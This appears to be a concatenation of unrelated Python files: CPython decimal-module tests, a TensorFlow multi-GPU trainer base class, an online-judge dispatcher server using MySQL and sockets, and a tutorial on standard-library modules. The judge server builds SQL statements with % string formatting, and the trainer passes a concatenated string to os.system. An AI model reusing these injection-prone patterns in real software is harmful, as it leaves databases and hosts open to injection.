self.assertRaises(C.InvalidOperation, Decimal("1").__round__, -int(MIN_ETINY-1)) self.assertRaises(OverflowError, Decimal("1.23").__round__, -int_max-2) self.assertRaises(OverflowError, Decimal("1.23").__round__, int_max+1) def test_c_format(self): # Restricted input Decimal = C.Decimal HAVE_CONFIG_64 = (C.MAX_PREC > 425000000) self.assertRaises(TypeError, Decimal(1).__format__, "=10.10", [], 9) self.assertRaises(TypeError, Decimal(1).__format__, "=10.10", 9) self.assertRaises(TypeError, Decimal(1).__format__, []) self.assertRaises(ValueError, Decimal(1).__format__, "<>=10.10") maxsize = 2**63-1 if HAVE_CONFIG_64 else 2**31-1 self.assertRaises(ValueError, Decimal("1.23456789").__format__, "=%d.1" % maxsize) def test_c_integral(self): Decimal = C.Decimal Inexact = C.Inexact localcontext = C.localcontext x = Decimal(10) self.assertEqual(x.to_integral(), 10) self.assertRaises(TypeError, x.to_integral, '10') self.assertRaises(TypeError, x.to_integral, 10, 'x') self.assertRaises(TypeError, x.to_integral, 10) self.assertEqual(x.to_integral_value(), 10) self.assertRaises(TypeError, x.to_integral_value, '10') self.assertRaises(TypeError, x.to_integral_value, 10, 'x') self.assertRaises(TypeError, x.to_integral_value, 10) self.assertEqual(x.to_integral_exact(), 10) self.assertRaises(TypeError, x.to_integral_exact, '10') self.assertRaises(TypeError, x.to_integral_exact, 10, 'x') self.assertRaises(TypeError, x.to_integral_exact, 10) with localcontext() as c: x = Decimal("99999999999999999999999999.9").to_integral_value(ROUND_UP) self.assertEqual(x, Decimal('100000000000000000000000000')) x = Decimal("99999999999999999999999999.9").to_integral_exact(ROUND_UP) self.assertEqual(x, Decimal('100000000000000000000000000')) c.traps[Inexact] = True self.assertRaises(Inexact, Decimal("999.9").to_integral_exact, ROUND_UP) def test_c_funcs(self): # Invalid arguments Decimal = C.Decimal InvalidOperation = C.InvalidOperation DivisionByZero = C.DivisionByZero getcontext = C.getcontext localcontext = C.localcontext self.assertEqual(Decimal('9.99e10').to_eng_string(), '99.9E+9') self.assertRaises(TypeError, pow, Decimal(1), 2, "3") self.assertRaises(TypeError, Decimal(9).number_class, "x", "y") self.assertRaises(TypeError, Decimal(9).same_quantum, 3, "x", "y") self.assertRaises( TypeError, Decimal("1.23456789").quantize, Decimal('1e-100000'), [] ) self.assertRaises( TypeError, Decimal("1.23456789").quantize, Decimal('1e-100000'), getcontext() ) self.assertRaises( TypeError, Decimal("1.23456789").quantize, Decimal('1e-100000'), 10 ) self.assertRaises( TypeError, Decimal("1.23456789").quantize, Decimal('1e-100000'), ROUND_UP, 1000 ) with localcontext() as c: c.clear_traps() # Invalid arguments self.assertRaises(TypeError, c.copy_sign, Decimal(1), "x", "y") self.assertRaises(TypeError, c.canonical, 200) self.assertRaises(TypeError, c.is_canonical, 200) self.assertRaises(TypeError, c.divmod, 9, 8, "x", "y") self.assertRaises(TypeError, c.same_quantum, 9, 3, "x", "y") self.assertEqual(str(c.canonical(Decimal(200))), '200') self.assertEqual(c.radix(), 10) c.traps[DivisionByZero] = True self.assertRaises(DivisionByZero, Decimal(9).__divmod__, 0) self.assertRaises(DivisionByZero, c.divmod, 9, 0) self.assertTrue(c.flags[InvalidOperation]) c.clear_flags() c.traps[InvalidOperation] = True self.assertRaises(InvalidOperation, Decimal(9).__divmod__, 0) self.assertRaises(InvalidOperation, c.divmod, 9, 0) self.assertTrue(c.flags[DivisionByZero]) c.traps[InvalidOperation] = True c.prec = 2 self.assertRaises(InvalidOperation, pow, Decimal(1000), 1, 501) def test_va_args_exceptions(self): Decimal = C.Decimal Context = C.Context x = Decimal("10001111111") for attr in ['exp', 'is_normal', 'is_subnormal', 'ln', 'log10', 'logb', 'logical_invert', 'next_minus', 'next_plus', 'normalize', 'number_class', 'sqrt', 'to_eng_string']: func = getattr(x, attr) self.assertRaises(TypeError, func, context="x") self.assertRaises(TypeError, func, "x", context=None) for attr in ['compare', 'compare_signal', 'logical_and', 'logical_or', 'max', 'max_mag', 'min', 'min_mag', 'remainder_near', 'rotate', 'scaleb', 'shift']: func = getattr(x, attr) self.assertRaises(TypeError, func, context="x") self.assertRaises(TypeError, func, "x", context=None) self.assertRaises(TypeError, x.to_integral, rounding=None, context=[]) self.assertRaises(TypeError, x.to_integral, rounding={}, context=[]) self.assertRaises(TypeError, x.to_integral, [], []) self.assertRaises(TypeError, x.to_integral_value, rounding=None, context=[]) self.assertRaises(TypeError, x.to_integral_value, rounding={}, context=[]) self.assertRaises(TypeError, x.to_integral_value, [], []) self.assertRaises(TypeError, x.to_integral_exact, rounding=None, context=[]) self.assertRaises(TypeError, x.to_integral_exact, rounding={}, context=[]) self.assertRaises(TypeError, x.to_integral_exact, [], []) self.assertRaises(TypeError, x.fma, 1, 2, context="x") self.assertRaises(TypeError, x.fma, 1, 2, "x", context=None) self.assertRaises(TypeError, x.quantize, 1, [], context=None) self.assertRaises(TypeError, x.quantize, 1, [], rounding=None) self.assertRaises(TypeError, x.quantize, 1, [], []) c = Context() self.assertRaises(TypeError, c.power, 1, 2, mod="x") self.assertRaises(TypeError, c.power, 1, "x", mod=None) self.assertRaises(TypeError, c.power, "x", 2, mod=None) @requires_extra_functionality def test_c_context_templates(self): self.assertEqual( C.BasicContext._traps, C.DecIEEEInvalidOperation|C.DecDivisionByZero|C.DecOverflow| C.DecUnderflow|C.DecClamped ) self.assertEqual( C.DefaultContext._traps, C.DecIEEEInvalidOperation|C.DecDivisionByZero|C.DecOverflow ) @requires_extra_functionality def test_c_signal_dict(self): # SignalDict coverage Context = C.Context DefaultContext = C.DefaultContext InvalidOperation = C.InvalidOperation FloatOperation = C.FloatOperation DivisionByZero = C.DivisionByZero Overflow = C.Overflow Subnormal = C.Subnormal Underflow = C.Underflow Rounded = C.Rounded Inexact = C.Inexact Clamped = C.Clamped DecClamped = C.DecClamped DecInvalidOperation = C.DecInvalidOperation DecIEEEInvalidOperation = C.DecIEEEInvalidOperation def assertIsExclusivelySet(signal, signal_dict): for sig in signal_dict: if sig == signal: self.assertTrue(signal_dict[sig]) else: self.assertFalse(signal_dict[sig]) c = DefaultContext.copy() # Signal dict methods self.assertTrue(Overflow in c.traps) c.clear_traps() for k in c.traps.keys(): c.traps[k] = True for v in c.traps.values(): self.assertTrue(v) c.clear_traps() for k, v in c.traps.items(): self.assertFalse(v) self.assertFalse(c.flags.get(Overflow)) self.assertIs(c.flags.get("x"), None) self.assertEqual(c.flags.get("x", "y"), "y") self.assertRaises(TypeError, c.flags.get, "x", "y", "z") self.assertEqual(len(c.flags), len(c.traps)) s = sys.getsizeof(c.flags) s = sys.getsizeof(c.traps) s = c.flags.__repr__() # Set flags/traps. c.clear_flags() c._flags = DecClamped self.assertTrue(c.flags[Clamped]) c.clear_traps() c._traps = DecInvalidOperation self.assertTrue(c.traps[InvalidOperation]) # Set flags/traps from dictionary. c.clear_flags() d = c.flags.copy() d[DivisionByZero] = True c.flags = d assertIsExclusivelySet(DivisionByZero, c.flags) c.clear_traps() d = c.traps.copy() d[Underflow] = True c.traps = d assertIsExclusivelySet(Underflow, c.traps) # Random constructors IntSignals = { Clamped: C.DecClamped, Rounded: C.DecRounded, Inexact: C.DecInexact, Subnormal: C.DecSubnormal, Underflow: C.DecUnderflow, Overflow: C.DecOverflow, DivisionByZero: C.DecDivisionByZero, FloatOperation: C.DecFloatOperation, InvalidOperation: C.DecIEEEInvalidOperation } IntCond = [ C.DecDivisionImpossible, C.DecDivisionUndefined, C.DecFpuError, C.DecInvalidContext, C.DecInvalidOperation, C.DecMallocError, C.DecConversionSyntax, ] lim = len(OrderedSignals[C]) for r in range(lim): for t in range(lim): for round in RoundingModes: flags = random.sample(OrderedSignals[C], r) traps = random.sample(OrderedSignals[C], t) prec = random.randrange(1, 10000) emin = random.randrange(-10000, 0) emax = random.randrange(0, 10000) clamp = random.randrange(0, 2) caps = random.randrange(0, 2) cr = random.randrange(0, 2) c = Context(prec=prec, rounding=round, Emin=emin, Emax=emax, capitals=caps, clamp=clamp, flags=list(flags), traps=list(traps)) self.assertEqual(c.prec, prec) self.assertEqual(c.rounding, round) self.assertEqual(c.Emin, emin) self.assertEqual(c.Emax, emax) self.assertEqual(c.capitals, caps) self.assertEqual(c.clamp, clamp) f = 0 for x in flags: f |= IntSignals[x] self.assertEqual(c._flags, f) f = 0 for x in traps: f |= IntSignals[x] self.assertEqual(c._traps, f) for cond in IntCond: c._flags = cond self.assertTrue(c._flags&DecIEEEInvalidOperation) assertIsExclusivelySet(InvalidOperation, c.flags) for cond in IntCond: c._traps = cond self.assertTrue(c._traps&DecIEEEInvalidOperation) assertIsExclusivelySet(InvalidOperation, c.traps) def test_invalid_override(self): Decimal = C.Decimal try: from locale import CHAR_MAX except ImportError: self.skipTest('locale.CHAR_MAX not available') def make_grouping(lst): return ''.join([chr(x) for x in lst]) def get_fmt(x, override=None, fmt='n'): return Decimal(x).__format__(fmt, override) invalid_grouping = { 'decimal_point' : ',', 'grouping' : make_grouping([255, 255, 0]), 'thousands_sep' : ',' } invalid_dot = { 'decimal_point' : 'xxxxx', 'grouping' : make_grouping([3, 3, 0]), 'thousands_sep' : ',' } invalid_sep = { 'decimal_point' : '.', 'grouping' : make_grouping([3, 3, 0]), 'thousands_sep' : 'yyyyy' } if CHAR_MAX == 127: # negative grouping in override self.assertRaises(ValueError, get_fmt, 12345, invalid_grouping, 'g') self.assertRaises(ValueError, get_fmt, 12345, invalid_dot, 'g') self.assertRaises(ValueError, get_fmt, 12345, invalid_sep, 'g') def test_exact_conversion(self): Decimal = C.Decimal localcontext = C.localcontext InvalidOperation = C.InvalidOperation with localcontext() as c: c.traps[InvalidOperation] = True # Clamped x = "0e%d" % sys.maxsize self.assertRaises(InvalidOperation, Decimal, x) x = "0e%d" % (-sys.maxsize-1) self.assertRaises(InvalidOperation, Decimal, x) # Overflow x = "1e%d" % sys.maxsize self.assertRaises(InvalidOperation, Decimal, x) # Underflow x = "1e%d" % (-sys.maxsize-1) self.assertRaises(InvalidOperation, Decimal, x) def test_from_tuple(self): Decimal = C.Decimal localcontext = C.localcontext InvalidOperation = C.InvalidOperation Overflow = C.Overflow Underflow = C.Underflow with localcontext() as c: c.traps[InvalidOperation] = True c.traps[Overflow] = True c.traps[Underflow] = True # SSIZE_MAX x = (1, (), sys.maxsize) self.assertEqual(str(c.create_decimal(x)), '-0E+999999') self.assertRaises(InvalidOperation, Decimal, x) x = (1, (0, 1, 2), sys.maxsize) self.assertRaises(Overflow, c.create_decimal, x) self.assertRaises(InvalidOperation, Decimal, x) # SSIZE_MIN x = (1, (), -sys.maxsize-1) self.assertEqual(str(c.create_decimal(x)), '-0E-1000007') self.assertRaises(InvalidOperation, Decimal, x) x = (1, (0, 1, 2), -sys.maxsize-1) self.assertRaises(Underflow, c.create_decimal, x) self.assertRaises(InvalidOperation, Decimal, x) # OverflowError x = (1, (), sys.maxsize+1) self.assertRaises(OverflowError, c.create_decimal, x) self.assertRaises(OverflowError, Decimal, x) x = (1, (), -sys.maxsize-2) self.assertRaises(OverflowError, c.create_decimal, x) self.assertRaises(OverflowError, Decimal, x) # Specials x = (1, (), "N") self.assertEqual(str(Decimal(x)), '-sNaN') x = (1, (0,), "N") self.assertEqual(str(Decimal(x)), '-sNaN') x = (1, (0, 1), "N") self.assertEqual(str(Decimal(x)), '-sNaN1') def test_sizeof(self): Decimal = C.Decimal HAVE_CONFIG_64 = (C.MAX_PREC > 425000000) self.assertGreater(Decimal(0).__sizeof__(), 0) if HAVE_CONFIG_64: x = Decimal(10**(19*24)).__sizeof__() y = Decimal(10**(19*25)).__sizeof__() self.assertEqual(y, x+8) else: x = Decimal(10**(9*24)).__sizeof__() y = Decimal(10**(9*25)).__sizeof__() self.assertEqual(y, x+4) def test_internal_use_of_overridden_methods(self): Decimal = C.Decimal # Unsound subtyping class X(float): def as_integer_ratio(self): return 1 def __abs__(self): return self class Y(float): def __abs__(self): return [1]*200 class I(int): def bit_length(self): return [1]*200 class Z(float): def as_integer_ratio(self): return (I(1), I(1)) def __abs__(self): return self for cls in X, Y, Z: self.assertEqual(Decimal.from_float(cls(101.1)), Decimal.from_float(101.1)) def test_maxcontext_exact_arith(self): # Make sure that exact operations do not raise MemoryError due # to huge intermediate values when the context precision is very # large. # The following functions fill the available precision and are # therefore not suitable for large precisions (by design of the # specification). MaxContextSkip = ['logical_invert', 'next_minus', 'next_plus', 'logical_and', 'logical_or', 'logical_xor', 'next_toward', 'rotate', 'shift'] Decimal = C.Decimal Context = C.Context localcontext = C.localcontext # Here only some functions that are likely candidates for triggering a # MemoryError are tested. deccheck.py has an exhaustive test. maxcontext = Context(prec=C.MAX_PREC, Emin=C.MIN_EMIN, Emax=C.MAX_EMAX) with localcontext(maxcontext): self.assertEqual(Decimal(0).exp(), 1) self.assertEqual(Decimal(1).ln(), 0) self.assertEqual(Decimal(1).log10(), 0) self.assertEqual(Decimal(10**2).log10(), 2) self.assertEqual(Decimal(10**223).log10(), 223) self.assertEqual(Decimal(10**19).logb(), 19) self.assertEqual(Decimal(4).sqrt(), 2) self.assertEqual(Decimal("40E9").sqrt(), Decimal('2.0E+5')) self.assertEqual(divmod(Decimal(10), 3), (3, 1)) self.assertEqual(Decimal(10) // 3, 3) self.assertEqual(Decimal(4) / 2, 2) self.assertEqual(Decimal(400) ** -1, Decimal('0.0025')) @requires_docstrings @unittest.skipUnless(C, "test requires C version") class SignatureTest(unittest.TestCase): """Function signatures""" def test_inspect_module(self): for attr in dir(P): if attr.startswith('_'): continue p_func = getattr(P, attr) c_func = getattr(C, attr) if (attr == 'Decimal' or attr == 'Context' or inspect.isfunction(p_func)): p_sig = inspect.signature(p_func) c_sig = inspect.signature(c_func) # parameter names: c_names = list(c_sig.parameters.keys()) p_names = [x for x in p_sig.parameters.keys() if not x.startswith('_')] self.assertEqual(c_names, p_names, msg="parameter name mismatch in %s" % p_func) c_kind = [x.kind for x in c_sig.parameters.values()] p_kind = [x[1].kind for x in p_sig.parameters.items() if not x[0].startswith('_')] # parameters: if attr != 'setcontext': self.assertEqual(c_kind, p_kind, msg="parameter kind mismatch in %s" % p_func) def test_inspect_types(self): POS = inspect._ParameterKind.POSITIONAL_ONLY POS_KWD = inspect._ParameterKind.POSITIONAL_OR_KEYWORD # Type heuristic (type annotations would help!): pdict = {C: {'other': C.Decimal(1), 'third': C.Decimal(1), 'x': C.Decimal(1), 'y': C.Decimal(1), 'z': C.Decimal(1), 'a': C.Decimal(1), 'b': C.Decimal(1), 'c': C.Decimal(1), 'exp': C.Decimal(1), 'modulo': C.Decimal(1), 'num': "1", 'f': 1.0, 'rounding': C.ROUND_HALF_UP, 'context': C.getcontext()}, P: {'other': P.Decimal(1), 'third': P.Decimal(1), 'a': P.Decimal(1), 'b': P.Decimal(1), 'c': P.Decimal(1), 'exp': P.Decimal(1), 'modulo': P.Decimal(1), 'num': "1", 'f': 1.0, 'rounding': P.ROUND_HALF_UP, 'context': P.getcontext()}} def mkargs(module, sig): args = [] kwargs = {} for name, param in sig.parameters.items(): if name == 'self': continue if param.kind == POS: args.append(pdict[module][name]) elif param.kind == POS_KWD: kwargs[name] = pdict[module][name] else: raise TestFailed("unexpected parameter kind") return args, kwargs def tr(s): """The C Context docstrings use 'x' in order to prevent confusion with the article 'a' in the descriptions.""" if s == 'x': return 'a' if s == 'y': return 'b' if s == 'z': return 'c' return s def doit(ty): p_type = getattr(P, ty) c_type = getattr(C, ty) for attr in dir(p_type): if attr.startswith('_'): continue p_func = getattr(p_type, attr) c_func = getattr(c_type, attr) if inspect.isfunction(p_func): p_sig = inspect.signature(p_func) c_sig = inspect.signature(c_func) # parameter names: p_names = list(p_sig.parameters.keys()) c_names = [tr(x) for x in c_sig.parameters.keys()] self.assertEqual(c_names, p_names, msg="parameter name mismatch in %s" % p_func) p_kind = [x.kind for x in p_sig.parameters.values()] c_kind = [x.kind for x in c_sig.parameters.values()] # 'self' parameter: self.assertIs(p_kind[0], POS_KWD) self.assertIs(c_kind[0], POS) # remaining parameters: if ty == 'Decimal': self.assertEqual(c_kind[1:], p_kind[1:], msg="parameter kind mismatch in %s" % p_func) else: # Context methods are positional only in the C version. self.assertEqual(len(c_kind), len(p_kind), msg="parameter kind mismatch in %s" % p_func) # Run the function: args, kwds = mkargs(C, c_sig) try: getattr(c_type(9), attr)(*args, **kwds) except Exception: raise TestFailed("invalid signature for %s: %s %s" % (c_func, args, kwds)) args, kwds = mkargs(P, p_sig) try: getattr(p_type(9), attr)(*args, **kwds) except Exception: raise TestFailed("invalid signature for %s: %s %s" % (p_func, args, kwds)) doit('Decimal') doit('Context') all_tests = [ CExplicitConstructionTest, PyExplicitConstructionTest, CImplicitConstructionTest, PyImplicitConstructionTest, CFormatTest, PyFormatTest, CArithmeticOperatorsTest, PyArithmeticOperatorsTest, CThreadingTest, PyThreadingTest, CUsabilityTest, PyUsabilityTest, CPythonAPItests, PyPythonAPItests, CContextAPItests, PyContextAPItests, CContextWithStatement, PyContextWithStatement, CContextFlags, PyContextFlags, CSpecialContexts, PySpecialContexts, CContextInputValidation, PyContextInputValidation, CContextSubclassing, PyContextSubclassing, CCoverage, PyCoverage, CFunctionality, PyFunctionality, CWhitebox, PyWhitebox, CIBMTestCases, PyIBMTestCases, ] # Delete C tests if _decimal.so is not present. if not C: all_tests = all_tests[1::2] else: all_tests.insert(0, CheckAttributes) all_tests.insert(1, SignatureTest) def test_main(arith=None, verbose=None, todo_tests=None, debug=None): """ Execute the tests. Runs all arithmetic tests if arith is True or if the "decimal" resource is enabled in regrtest.py """ init(C) init(P) global TEST_ALL, DEBUG TEST_ALL = arith if arith is not None else is_resource_enabled('decimal') DEBUG = debug if todo_tests is None: test_classes = all_tests else: test_classes = [CIBMTestCases, PyIBMTestCases] # Dynamically build custom test definition for each file in the test # directory and add the definitions to the DecimalTest class. This # procedure insures that new files do not get skipped. for filename in os.listdir(directory): if '.decTest' not in filename or filename.startswith("."): continue head, tail = filename.split('.') if todo_tests is not None and head not in todo_tests: continue tester = lambda self, f=filename: self.eval_file(directory + f) setattr(CIBMTestCases, 'test_' + head, tester) setattr(PyIBMTestCases, 'test_' + head, tester) del filename, head, tail, tester try: run_unittest(*test_classes) if todo_tests is None: from doctest import IGNORE_EXCEPTION_DETAIL savedecimal = sys.modules['decimal'] if C: sys.modules['decimal'] = C run_doctest(C, verbose, optionflags=IGNORE_EXCEPTION_DETAIL) sys.modules['decimal'] = P run_doctest(P, verbose) sys.modules['decimal'] = savedecimal finally: if C: C.setcontext(ORIGINAL_CONTEXT[C]) P.setcontext(ORIGINAL_CONTEXT[P]) if not C: warnings.warn('C tests skipped: no module named _decimal.', UserWarning) if not orig_sys_decimal is sys.modules['decimal']: raise TestFailed("Internal error: unbalanced number of changes to " "sys.modules['decimal'].") if __name__ == '__main__': import optparse p = optparse.OptionParser("test_decimal.py [--debug] [{--skip | test1 [test2 [...]]}]") p.add_option('--debug', '-d', action='store_true', help='shows the test number and context before each test') p.add_option('--skip', '-s', action='store_true', help='skip over 90% of the arithmetic tests') (opt, args) = p.parse_args() if opt.skip: test_main(arith=False, verbose=True) elif args: test_main(arith=True, verbose=True, todo_tests=args, debug=opt.debug) else: test_main(arith=True, verbose=True)
ITraining.py
import abc import threading from tfcore.utilities.utils import * from tfcore.utilities.params_serializer import ParamsSerializer class ITrainer_Params(ParamsSerializer): __metaclass__ = abc.ABCMeta @abc.abstractmethod def __init__(self): super().__init__() self.is_train = True self.gpu = True self.gpus = [0] # [0, 1, 2, 3] self.batch_size = 16 self.epoch = 1 self.new = True self.checkpoint_dir = 'checkpoints' self.make_summery_full = False self.make_summery_graph = False self.use_tensorboard = False class ITrainer(): __metaclass__ = abc.ABCMeta @abc.abstractmethod def __init__(self, params): self.params = params print('Libs loaded') print('Tensorflow ' + tf.__version__) gpus = self.params.gpus # Here I set CUDA to only see one GPU os.environ["CUDA_VISIBLE_DEVICES"] = ','.join([str(i) for i in gpus]) if self.params.gpu: gpu_nums = len(self.params.gpus) else: gpu_nums = 0 gpu_options = tf.GPUOptions() gpu_options.allocator_type = 'BFC' gpu_options.allow_growth = True config = tf.ConfigProto(allow_soft_placement=True, log_device_placement=False, gpu_options=gpu_options, device_count={'GPU': gpu_nums}) self.sess = tf.Session(config=config) self.summaries_val = [] self.summaries_val_2 = [] self.summaries_vis = [] self.summaries_vis_2 = [] self.summaries_vis_one = [] self.summaries_vis_one_2 = [] self.summaries = [] self.summaries_2 = [] self.summary_val = None self.summary_val_2 = None self.summary_vis = None self.summary_vis_2 = None self.summary_vis_one = None self.summary_vis_one_2 = None self.summary = None self.summary_2 = None self.model_dir = 'model' self.sample_dir = 'samples' self.checkpoint_dir = 'checkpoint' self.log_dir = 'logs' self.saver = None self.writer = None self.models = [] self.init_global_step = 0 if not self.params.new: self.init_global_step = get_global_steps(self.params.checkpoint_dir) self.epoch = tf.placeholder(tf.int32, name='epoch') self.global_step = tf.Variable(self.init_global_step, trainable=False) self.batch_size_total = self.params.batch_size self.batch_size = int(self.batch_size_total / len(self.params.gpus)) @abc.abstractmethod def __del__(self): tf.reset_default_graph() self.sess.close() print('[*] Session closed...') def launch_tensorboard(self): import os os.system('tensorboard --logdir=' + self.log_dir + ' --port=8009') return def make_summarys(self, gradient_list=[]): if self.params.make_summery_full: for var in tf.trainable_variables(): self.summaries_val.append(tf.summary.histogram(var.op.name, var)) for grads in gradient_list: for grad, var in grads: self.summaries_val.append(tf.summary.histogram(var.op.name + '/gradients', grad)) print(' [*] Full Summery created...') for model in self.models: self.summaries_val.extend(model.summary_val) self.summaries_vis.extend(model.summary_vis) self.summaries_vis_one.extend(model.summary_vis_one) self.summaries.extend(model.summary) self.summaries_val_2.extend(model.summary_val_2) self.summaries_vis_2.extend(model.summary_vis_2) self.summaries_vis_one_2.extend(model.summary_vis_one_2) self.summaries_2.extend(model.summary_2) self.summary_val = tf.summary.merge([self.summaries_val]) self.summary_vis = tf.summary.merge([self.summaries_vis]) self.summary_vis_one = tf.summary.merge([self.summaries_vis_one]) self.summary = tf.summary.merge([self.summaries]) self.summary_val_2 = tf.summary.merge([self.summaries_val_2]) self.summary_vis_2 = tf.summary.merge([self.summaries_vis_2]) self.summary_vis_one_2 = tf.summary.merge([self.summaries_vis_one_2]) self.summary_2 = tf.summary.merge([self.summaries_2]) if self.params.make_summery_graph: self.writer = tf.summary.FileWriter(os.path.join(self.log_dir), self.sess.graph) else: self.writer = tf.summary.FileWriter(os.path.join(self.log_dir)) if self.params.use_tensorboard: t = threading.Thread(target=self.launch_tensorboard, args=([])) t.start() print(' [*] Log-file ' + os.path.join(self.log_dir) + ' created...') @abc.abstractmethod def validate(self, epoch, counter, idx): raise NotImplementedError("Please Implement this method") @abc.abstractmethod def build_model(self, tower_id): raise NotImplementedError("Please Implement this method") @staticmethod def compute_tower_gradients(model, max_norm=5.0): model.vars = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, scope=model.params.scope) grads = model.optimizer.compute_gradients(model.total_loss, var_list=model.vars) #grads = [(tf.clip_by_norm(grad, max_norm), var) for grad, var in grads] print(' [*] Gradients of ' + model.params.name + ' computed...') return grads def build_pipeline(self): if self.params.gpu: device = "/gpu:" else: device = "/cpu:" tower_index = 0 with tf.variable_scope(tf.get_variable_scope()): for tower_id in self.params.gpus: with tf.device(device + '%d' % tower_id): with tf.name_scope('Tower_%d' % (tower_index)) as scope: print(' [*] Tower ' + str(tower_index) + ' ' + device + str(tower_id)) self.models = self.build_model(tower_id=tower_index) tf.get_variable_scope().reuse_variables() update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS) with tf.control_dependencies(update_ops): for i in range(len(self.models)): gradients = self.compute_tower_gradients(self.models[i]) self.models[i].gradients.append(gradients) tower_index += 1 gradient_list = [] update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS) with tf.control_dependencies(update_ops): for i in range(len(self.models)): if tower_index > 1: grads = average_gradients(self.models[i].gradients) print(' [*] Gradients of ' + self.models[i].params.name + ' averaged...') else: grads = self.models[i].gradients[0] self.models[i].optimizer = self.models[i].optimizer.apply_gradients(grads, global_step=self.global_step) gradient_list.append(grads) print(' [*] Gradients of ' + self.models[i].params.name + ' applyed...') self.make_summarys(gradient_list) print(' [*] Build pipeline pass...') return @abc.abstractmethod def train_online(self, batch_X, batch_Y, epoch=0, counter=1, idx=0, batch_total=0): raise NotImplementedError("Please Implement this method") @abc.abstractmethod def train(self): raise NotImplementedError("Please Implement this method")
main.py
# coding=utf-8 import MySQLdb from queue import Queue import socket import json from time import sleep import threading import os mutex = threading.Lock() # queue mutex queue = Queue() # 全局判题列表 myjsonfile = open("./setting.json", 'r') judgerjson = json.loads(myjsonfile.read()) if os.environ.get("DB_USER"): judgerjson["db_ip"] = os.environ.get("DB_HOST") judgerjson["db_pass"] = os.environ.get("DB_PASSWORD") judgerjson["db_user"] = os.environ.get("DB_USER") judgerjson["db_port"] = os.environ.get("DB_PORT") try: db = MySQLdb.connect(judgerjson["db_ip"], judgerjson["db_user"], judgerjson["db_pass"], judgerjson["db_database"], int(judgerjson["db_port"]), charset='utf8') except Exception as e: print(e) exit(1) # 获取未判题列表,放入到全局队列中 def getSubmition(): global queue, mutex, db cursor = db.cursor() while True: sleep(1) if mutex.acquire(): cursor.execute( "SELECT * from judgestatus_judgestatus where result = '-1'") data = cursor.fetchall() try: for d in data: queue.put(d[0]) cursor.execute( "UPDATE judgestatus_judgestatus SET result = '-6' WHERE id = '%d'" % d[0]) db.commit() except: db.rollback() mutex.release() db.close() # 处理每个判题机的逻辑 def deal_client(newSocket: socket, addr): global mutex, queue statue = False cursor = db.cursor() falsetime = 0 while True: sleep(2) # 每隔两秒取两次 if mutex.acquire(): # 获取队列锁 try: if statue == True and queue.empty() is not True: id = queue.get() # 如果可以判题,那就发送判题命令 cursor.execute( "SELECT language from judgestatus_judgestatus where id = '%d'" % (id)) data = cursor.fetchall() # print(data[0][0]) newSocket.send(("judge|%d" % id).encode("utf-8")) statue = False else: newSocket.send("getstatue".encode("utf-8")) data = newSocket.recv(1024) recv_data = data.decode('utf-8') if recv_data == "ok": falsetime = 0 statue = True else: falsetime = falsetime + 1 statue = False if falsetime >= 3600: # 计算一下未准备好的时间,如果超过120s,发送销毁重启命令 newSocket.send("timeout".encode("utf-8")) # print(addr, "timeout!") newSocket.close() mutex.release() return # print(addr, statue) except socket.error: newSocket.close() mutex.release() return except: print("error!") mutex.release() return mutex.release() server = socket.socket(socket.AF_INET, socket.SOCK_STREAM) server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) server.bind(("", judgerjson["server_port"])) server.listen(20) print("server is running!") t = threading.Thread(target=getSubmition, args=()) # 用一个线程去跑 t.setDaemon(True) t.start() # 比赛题目设置为auth=2,contest开始时,自动设置题目为auth=3,比赛结束自动设置auth=1 def changeauth(): global db, mutex curcontest = set() curpro = set() curinpro = set() cursor = db.cursor() while True: sleep(2) if mutex.acquire(): cursor.execute( "SELECT * from contest_contestinfo where type <> 'Personal' and TO_SECONDS(NOW()) - TO_SECONDS(begintime) <= lasttime") data = cursor.fetchall() getcontest = set() for d in data: getcontest.add(d[0]) # 用于求结束的比赛 cursor.execute( "SELECT * from contest_contestproblem where contestid=%d" % d[0]) pros = cursor.fetchall() for pid in pros: if pid[2] not in curpro: curpro.add(pid[2]) cursor.execute( "UPDATE problem_problemdata SET auth = 2 WHERE problem = %s" % pid[2]) cursor.execute( "UPDATE problem_problem SET auth = 2 WHERE problem = %s" % pid[2]) db.commit() cursor.execute( "SELECT * from contest_contestinfo where type <> 'Personal' and TO_SECONDS(NOW()) - TO_SECONDS(begintime) <= lasttime and TO_SECONDS(NOW()) - TO_SECONDS(begintime) >=-1") data = cursor.fetchall() for d in data: cursor.execute( "SELECT * from contest_contestproblem where contestid=%d" % d[0]) pros = cursor.fetchall() for pid in pros: if pid[2] not in curinpro: curinpro.add(pid[2]) cursor.execute( "UPDATE problem_problemdata SET auth = 3 WHERE problem = %s" % pid[2]) cursor.execute( "UPDATE problem_problem SET auth = 3 WHERE problem = %s" % pid[2]) db.commit() endcontest = curcontest.difference(getcontest) # print("curcontest", curcontest) for eid in endcontest: cursor.execute( "SELECT * from contest_contestproblem where contestid=%d" % eid) pros = cursor.fetchall() for pid in pros: try: curpro.remove(pid[2]) curinpro.remove(pid[2]) except KeyError: pass cursor.execute( "UPDATE problem_problemdata SET auth = 1 WHERE problem = %s" % pid[2]) cursor.execute( "UPDATE problem_problem SET auth = 1 WHERE problem = %s" % pid[2]) db.commit() curcontest = getcontest mutex.release() t1 = threading.Thread(target=changeauth, args=()) t1.setDaemon(True) t1.start() # 循环监听 while True: newSocket, addr = server.accept() print("client [%s] is connected!" % str(addr)) client = threading.Thread(target=deal_client, args=(newSocket, addr)) client.setDaemon(True) client.start()
external-func.py
import sys print(sys.argv) # python3 external-func.py a b c # ['external-func.py', 'a', 'b', 'c'] print(sys.path) # You can add path using sys.path.append # sys.exit() import pickle # save as object f = open("test.txt", "wb") data = {1: "python", 2: "you need"} pickle.dump(data, f) f.close() # get object f = open("test.txt", "rb") data = pickle.load(f) print(data) f.close() # {1: 'python', 2: 'you need'} import os # print(os.environ) # print(os.environ["PATH"]) """ os.chdir("../") print(os.getcwd()) print(os.system("ls")) os.mkdir("Directory name") # make dir os.rmdir("Directory name") # remove dir. only empty directory os.unlink("filename") # remove file os.rename(src,"filename") # rename file """ import shutil shutil.copy("test.txt", "text_copy.txt") import glob print(glob.glob("./*")) # print all file in this directory import tempfile filename = tempfile.mktemp() print(filename) # /tmp/tmpbecg5zqs # os.unlink(filename) import time print(time.time()) # 1503214710.753079 print(time.localtime(time.time())) # time.struct_time(tm_year=2017, tm_mon=8, tm_mday=20, tm_hour=8, 